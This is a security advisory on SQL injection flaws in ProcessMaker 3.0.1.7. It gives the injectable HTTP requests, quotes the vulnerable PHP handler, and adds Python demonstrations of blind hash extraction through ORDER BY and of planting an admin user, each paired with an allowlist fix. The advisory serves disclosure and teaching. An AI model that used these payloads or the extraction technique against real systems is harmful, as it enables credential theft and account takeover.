Talos Vulnerability Report

TALOS-2017-0313

ProcessMaker Enterprise Core Multiple SQL Injection Vulnerabilities

July 19, 2017
CVE Number

CVE-2016-9048

Summary

Multiple exploitable SQL injection vulnerabilities exist in ProcessMaker Enterprise Core 3.0.1.7-community. Specially crafted web requests can cause SQL injection. An attacker can send a web request whose parameters contain SQL injection payloads to trigger these vulnerabilities, potentially allowing exfiltration of the database, including user credentials, and in certain setups access to the underlying operating system.

Tested Versions

ProcessMaker Enterprise Core 3.0.1.7-community

Product URLs

https://www.processmaker.com/community-2

CVSSv3 Score

7.4 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Details

SQL injection has been found and confirmed within ProcessMaker Enterprise Core. A successful attack could allow an attacker to access information such as usernames and password hashes stored in the database.

The following URLs and parameters have been confirmed to suffer from SQL injection and can be exploited by authenticated attackers:

GET /sysworkflow/en/neoclassic/events/eventsAjax?request=eventList&start=1&limit=25&process=1&type=1&status=1&sort=[SQL INJECTION]&dir=ASC HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close

POST /sysworkflow/en/neoclassic/cases/proxyPMTablesSaveFields.php HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

callback=1&dir=1&sort=[SQL INJECTION]&query=1&table=1&action=1

POST /sysworkflow/en/neoclassic/cases/proxyProcessList.php?t=1&callback=a&dir=/&query=13 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

sort=[SQL INJECTION]

GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?function=changeLabel&cat=1[SQL INJECTION]&node=1&lang=1&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close

GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?function=changeLabel&cat=1&node=1&lang=1[SQL INJECTION]&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close

GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?function=changeLabel&cat=1&node=1[SQL INJECTION]&lang=1&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close

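As an added illustration of the sort=[SQL INJECTION] endpoints above (example code written for this page, not ProcessMaker's code): a boolean-based blind extraction through an ORDER BY clause, modelled against an in-memory SQLite database, followed by the allowlist fix. The users and events tables, the usr_password, evn_uid and evn_name columns and the hash values are constructed for the example and do not describe ProcessMaker's schema.

```python
"""Blind SQL injection through a user-controlled ORDER BY column.

Constructed example: the schema, data and query builder below model the
bug class, not the application's real code."""
import sqlite3

HEX = "0123456789abcdef"


def make_db():
    """Constructed stand-in for the application database."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users  (usr_username TEXT, usr_password TEXT);
        INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO users VALUES ('bob',   'e10adc3949ba59abbe56e057f20f883e');
        CREATE TABLE events (evn_uid TEXT, evn_name TEXT);
        INSERT INTO events VALUES ('e1', 'zeta');
        INSERT INTO events VALUES ('e2', 'alpha');
    """)
    return con


def event_list_vulnerable(con, sort, direction="ASC"):
    """Bug class from the report: sort/dir are concatenated into ORDER BY."""
    sql = f"SELECT evn_uid FROM events ORDER BY {sort} {direction}"
    return [row[0] for row in con.execute(sql)]


def oracle(con, condition):
    """Boolean oracle: a CASE in ORDER BY sorts by evn_uid when the condition
    holds (e1 comes first) and by evn_name otherwise (e2 comes first)."""
    payload = f"(CASE WHEN ({condition}) THEN evn_uid ELSE evn_name END)"
    return event_list_vulnerable(con, payload)[0] == "e1"


def extract_admin_hash(con, length=32):
    """Recover the admin password hash one hex digit at a time, using only
    the order of the rows the endpoint returns."""
    hash_query = "SELECT usr_password FROM users WHERE usr_username='admin'"
    recovered = ""
    for pos in range(1, length + 1):
        for c in HEX:
            if oracle(con, f"substr(({hash_query}),{pos},1)='{c}'"):
                recovered += c
                break
        else:
            break  # no candidate matched: value shorter than expected
    return recovered


ALLOWED_SORT = {"evn_uid", "evn_name"}


def event_list_fixed(con, sort, direction="ASC"):
    """Identifiers cannot be bound as query parameters, so the fix is a
    server-side allowlist of column names and a fixed choice of direction."""
    if sort not in ALLOWED_SORT:
        raise ValueError(f"invalid sort column: {sort!r}")
    direction = "DESC" if direction.upper() == "DESC" else "ASC"
    sql = f"SELECT evn_uid FROM events ORDER BY {sort} {direction}"
    return [row[0] for row in con.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    print("leaked admin hash:", extract_admin_hash(db))
    try:
        event_list_fixed(db, "(CASE WHEN 1=1 THEN evn_uid ELSE evn_name END)")
    except ValueError as e:
        print("fixed handler rejected payload:", e)
```

The oracle needs only two rows whose order differs between the two candidate sort columns; the same CASE construction works for any ORDER BY injection point where the attacker cannot add a UNION. Binding the value of sort as a parameter would not help (it would be treated as a constant), which is why an allowlist is the correct fix for identifier injection.
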
Unauthenticated SQL injection:

GET /gulliver/genericAjax?request=storeInTmp&pkt=int&pk=[SQL Injection]&table=a[SQL Injection]&cnn=[CONNECTION NAME] HTTP/1.1
Host: 192.168.56.101
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Note: For this SQL injection to work, the 'cnn' parameter must be known, as it names the database connection used to run the query. The following code, which is reachable without authentication, contains the issue:

gulliver/methods/genericAjax.php

    case 'storeInTmp':
      try {
        // ...
        $con = Propel::getConnection($_GET['cnn']);
        if($_GET['pkt'] == 'int'){
          // primary-key and table names are concatenated straight into the query
          $rs = $con->executeQuery("SELECT MAX({$_GET['pk']}) as lastId FROM {$_GET['table']};");
          $rs->next();
          $row = $rs->getRow();
          $gKey = (int)$row['lastId'] + 1;

        } else {
          $gKey = G::encryptOld(date('Y-m-d H:i:s').'@'.rand());
        }

        // table, both column names and the inserted value are all taken from the request
        $rs = $con->executeQuery("INSERT INTO {$_GET['table']} ({$_GET['pk']}, {$_GET['fld']}) VALUES ('$gKey', '{$_GET['value']}');");

        echo "{status: 1, message: \"success\"}";
      } catch (Exception $e) {
        $err = $e->getMessage();
        //$err = eregi_replace("[\n|\r|\n\r]", ' ', $err);
        $err = preg_replace("[\n|\r|\n\r]", " ", $err); //Made compatible to PHP 5.3

        // the raw database error message is returned to the client
        echo "{status: 0, message: \"" . $err . "\"}";
      }
      break;
  }
}
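
To make the impact of the storeInTmp handler concrete, the following Python model (written for this page; it is not ProcessMaker code) reproduces its query construction against an in-memory SQLite database, shows that a caller who controls table, pk, fld and value can write a row of their choosing into any table, and contrasts it with a handler that allowlists identifiers and binds the value. The tmp_data and users tables, the usr_role column and the role names are constructed for the example and do not describe ProcessMaker's schema.

```python
"""Arbitrary-row-write primitive from concatenated identifiers and values.

Constructed example modelling the storeInTmp case; schema and data are
invented for illustration."""
import sqlite3


def make_db():
    """Constructed stand-in schema: a scratch table the handler is meant to
    write to, and a sensitive table it should never touch."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE tmp_data (id INTEGER, note TEXT);
        CREATE TABLE users (usr_uid TEXT, usr_username TEXT, usr_role TEXT);
        INSERT INTO users VALUES ('u1', 'alice', 'OPERATOR');
    """)
    return con


def store_in_tmp_vulnerable(con, table, pk, fld, value, pkt="int"):
    """Same construction as the storeInTmp case: identifiers and the value are
    interpolated into the SQL text, so the caller decides where data lands."""
    if pkt == "int":
        row = con.execute(f"SELECT MAX({pk}) as lastId FROM {table};").fetchone()
        gkey = int(row[0] or 0) + 1
    else:
        gkey = "generated-key"  # stands in for G::encryptOld(...)
    con.execute(f"INSERT INTO {table} ({pk}, {fld}) VALUES ('{gkey}', '{value}');")
    return gkey


def role_of(con, username):
    row = con.execute("SELECT usr_role FROM users WHERE usr_username=?",
                      (username,)).fetchone()
    return row[0] if row else None


def plant_user(con):
    """Attacker's use of the primitive: point the handler at the users table,
    extend the column list through fld and close the quoted value through value.
    Resulting SQL:
      INSERT INTO users (usr_uid, usr_username, usr_role)
      VALUES ('generated-key', 'mallory', 'ADMIN');"""
    store_in_tmp_vulnerable(con, table="users", pk="usr_uid",
                            fld="usr_username, usr_role",
                            value="mallory', 'ADMIN", pkt="str")
    return role_of(con, "mallory")


# Server-side map of the only table/columns this endpoint may write to.
ALLOWED = {"tmp_data": {"pk": "id", "fields": {"note"}}}


def store_in_tmp_fixed(con, table, fld, value):
    """Identifiers come from the allowlist; the value is bound, never spliced."""
    spec = ALLOWED.get(table)
    if spec is None or fld not in spec["fields"]:
        raise ValueError("unknown table or field")
    pk = spec["pk"]
    row = con.execute(f"SELECT MAX({pk}) FROM {table}").fetchone()
    gkey = int(row[0] or 0) + 1
    con.execute(f"INSERT INTO {table} ({pk}, {fld}) VALUES (?, ?)", (gkey, value))
    return gkey


def note_of(con, key):
    row = con.execute("SELECT note FROM tmp_data WHERE id=?", (key,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("role written through the vulnerable handler:", plant_user(db))
    print("fixed handler stored key:", store_in_tmp_fixed(db, "tmp_data", "note", "x', 'y"))
```

No quote-breaking is even required for the first attack: because the table and column names are taken verbatim from the request, the handler is an unauthenticated write primitive into any table the database connection can reach, and the echoed error message turns failed attempts into a feedback channel. The fixed version should additionally sit behind authentication; the MAX()+1 key generation it keeps is still racy under concurrent requests and belongs to the database (an autoincrement column) rather than the application.
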

Mitigation

Restrict access to known, trusted users and hosts.

Timeline

2016-02-15 - Vendor Disclosure
2017-07-19 - Public Release

Credit

Discovered by Jerzy Kramarz of Portcullis Computer Security Limited.